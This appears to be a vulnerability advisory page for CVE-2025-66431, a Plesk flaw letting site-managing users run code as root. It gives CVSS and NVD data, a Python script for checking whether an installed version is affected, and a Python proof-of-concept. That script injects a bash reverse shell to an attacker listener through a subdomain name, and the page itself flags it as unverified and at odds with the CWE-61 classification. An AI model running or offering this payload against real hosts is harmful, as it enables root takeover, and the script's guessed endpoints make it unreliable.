Security Vulnerability Report

CVE-2025-66431

Published: 2025-12-03 17:15:55
Last Modified: 2026-04-15 00:35:42

Description

WebPros Plesk before 18.0.73.5 and 18.0.74 before 18.0.74.2 on Linux allows remote authenticated users to execute arbitrary code as root via domain creation. The attacker needs "Create and manage sites" with "Domains management" and "Subdomains management."

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Note: the vector rates Attack Vector as Local (AV:L) with High attack complexity, while the description speaks of remote authenticated users; the weakness in the NVD record is CWE-61 (UNIX symbolic link following), not command injection. The privileges required are those of an ordinary Plesk customer account holding the listed domain permissions, and the changed scope reflects escalation from that account to root on the host.

Configurations (Affected Products)

The NVD record carries no CPE configuration data. Affected versions, taken from the description:

Plesk < 18.0.73.5 (Linux builds)
Plesk 18.0.74 < 18.0.74.2 (Linux builds)
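To turn the affected ranges above into a check that can run on a host, here is an added Python example (not Plesk's or NVD's code). It encodes the two ranges from the advisory text, parses version strings in the forms "18.0.74", "18.0.74.2" and "18.0.74 Update #2", and can read the installed version from /usr/local/psa/version. The file path, its first-field layout, and the mapping of "Update #N" to a fourth version component are assumptions; if the file omits the update number, pass the full `plesk version` CLI output to `is_affected` instead.

```python
"""Affected-version triage for CVE-2025-66431 (added example, not Plesk or NVD code).

Encodes the two ranges from the advisory text on this page:
    Plesk < 18.0.73.5            (any Linux build below 18.0.73 Update 5)
    18.0.74 <= Plesk < 18.0.74.2 (18.0.74 before Update 2)
Assumptions: "Update #N" maps to a fourth version component N, and the
installed version can be read from /usr/local/psa/version, whose first
whitespace-separated field is the product version.
"""
import re
from pathlib import Path

VERSION_FILE = Path("/usr/local/psa/version")  # assumed location of Plesk's version file

# (lower bound inclusive or None, upper bound exclusive), from the advisory text.
AFFECTED_RANGES = [
    (None, (18, 0, 73, 5)),
    ((18, 0, 74, 0), (18, 0, 74, 2)),
]

_VERSION_RE = re.compile(r"(\d+(?:\.\d+){1,3})(?:\s+Update\s+#?(\d+))?")


def parse_version(text: str) -> tuple[int, ...]:
    """Extract a Plesk version from text and return it as a 4-tuple.

    Accepts "18.0.74", "18.0.74.2", "18.0.74 Update #2" and lines such as
    "Product version: Plesk Obsidian 18.0.73.4". Missing components are
    zero-padded so that 18.0.74 compares equal to 18.0.74.0.
    """
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no Plesk version found in {text!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    if m.group(2) is not None:
        if len(parts) == 4:
            raise ValueError(f"ambiguous version (four components plus an Update number): {text!r}")
        parts.append(int(m.group(2)))
    parts += [0] * (4 - len(parts))
    return tuple(parts[:4])


def is_affected(version: str, os_name: str = "Linux") -> bool:
    """True when the version lies in an affected range on a Linux host.

    The advisory scopes the issue to Plesk on Linux, so any other OS returns False.
    """
    if os_name.strip().lower() != "linux":
        return False
    v = parse_version(version)
    return any((low is None or v >= low) and v < high for low, high in AFFECTED_RANGES)


def installed_version(path: Path = VERSION_FILE) -> str:
    """Read the product version from Plesk's version file (assumed format)."""
    return path.read_text(encoding="utf-8").split()[0]


if __name__ == "__main__":
    try:
        current = installed_version()
    except FileNotFoundError:
        print(f"{VERSION_FILE} not found; is this a Plesk host?")
    else:
        verdict = "AFFECTED" if is_affected(current) else "not affected"
        print(f"Plesk {current}: {verdict} by CVE-2025-66431")
```

Note the boundary behaviour: 18.0.73.5 and 18.0.74.2 are the first fixed builds and report not affected, while 18.0.73.6 through 18.0.73.x are also fixed because only 18.0.74.0 and 18.0.74.1 fall in the second range.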

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Treat it as unverified: the NVD record classifies the weakness as CWE-61 (UNIX symbolic link following), whereas this script assumes shell command injection through the subdomain name, and the login and subdomain-creation endpoints and form fields it posts to are the script's own assumptions and are not documented anywhere on this page. Run it only against a lab instance you control, and expect to adapt or discard it.
```python
# CVE-2025-66431 PoC - Plesk Domain Creation Privilege Escalation
# Requires an authenticated user with "Create and manage sites",
# "Domains management" and "Subdomains management" permissions.
# The endpoints, form fields and injection point below are this script's
# assumptions; the NVD record classifies the flaw as CWE-61 (symlink following).
import argparse

import requests


def exploit_plesk(target_url, username, password, lhost, lport):
    """
    Exploit CVE-2025-66431: Plesk Domain Creation RCE as root
    """
    session = requests.Session()

    # Step 1: Login to Plesk (assumed form-based login endpoint and field names)
    login_url = f"{target_url}/login.php"
    login_data = {
        'login_name': username,
        'passwd': password,
        'locale': 'en_US',
    }
    login_resp = session.post(login_url, data=login_data, timeout=30)
    login_resp.raise_for_status()

    # Step 2: Create a subdomain carrying the payload
    # (assumed: command injection through the subdomain name)
    subdomain_url = f"{target_url}/domains/create/subdomain.php"

    # Generate reverse shell payload; ${IFS} replaces spaces to survive
    # whitespace filtering, and forward slashes are backslash-escaped.
    reverse_shell = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    encoded_payload = reverse_shell.replace(' ', '${IFS}').replace('/', '\\/')

    # Malicious subdomain name containing the injection
    subdomain_data = {
        'domain_name': f"test;echo {encoded_payload} | bash;--",
        'parent_domain_id': '1',
        'web_user_id': '0',
        'www_root': f'/var/www/vhosts/${{DOMAIN}}',
    }

    response = session.post(subdomain_url, data=subdomain_data, timeout=30)

    print(f"[*] Exploit sent to {target_url}")
    print(f"[*] Check listener on {lhost}:{lport}")

    return response.status_code


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-66431 Exploit')
    parser.add_argument('--url', required=True, help='Plesk target URL')
    parser.add_argument('--user', required=True, help='Username')
    # dest= is needed because "pass" is a Python keyword and args.pass would not parse
    parser.add_argument('--pass', dest='password', required=True, help='Password')
    parser.add_argument('--lhost', required=True, help='Listener IP')
    parser.add_argument('--lport', required=True, help='Listener Port', type=int)
    args = parser.parse_args()
    exploit_plesk(args.url, args.user, args.password, args.lhost, args.lport)
```

References

https://docs.plesk.com/release-notes/obsidian/change-log/#plesk-18074 (Plesk Obsidian change log, 18.0.74)
https://docs.plesk.com/release-notes/obsidian/whats-new/ (Plesk Obsidian what's new)
https://support.plesk.com/hc/en-us/articles/36494997377687--CVE-2025-66431-Security-vulnerability-in-domain-creation-mechanism-allows-Plesk-users-to-execute-arbitrary-code-on-behalf-of-root (Plesk support article for CVE-2025-66431)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66431",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-03T17:15:54.810",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WebPros Plesk before 18.0.73.5 and 18.0.74 before 18.0.74.2 on Linux allows remote authenticated users to execute arbitrary code as root via domain creation. The attacker needs \"Create and manage sites\" with \"Domains management\" and \"Subdomains management.\""
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.1,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-61"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.plesk.com/release-notes/obsidian/change-log/#plesk-18074",
        "source": "[email protected]"
      },
      {
        "url": "https://docs.plesk.com/release-notes/obsidian/whats-new/",
        "source": "[email protected]"
      },
      {
        "url": "https://support.plesk.com/hc/en-us/articles/36494997377687--CVE-2025-66431-Security-vulnerability-in-domain-creation-mechanism-allows-Plesk-users-to-execute-arbitrary-code-on-behalf-of-root",
        "source": "[email protected]"
      }
    ]
  }
}
```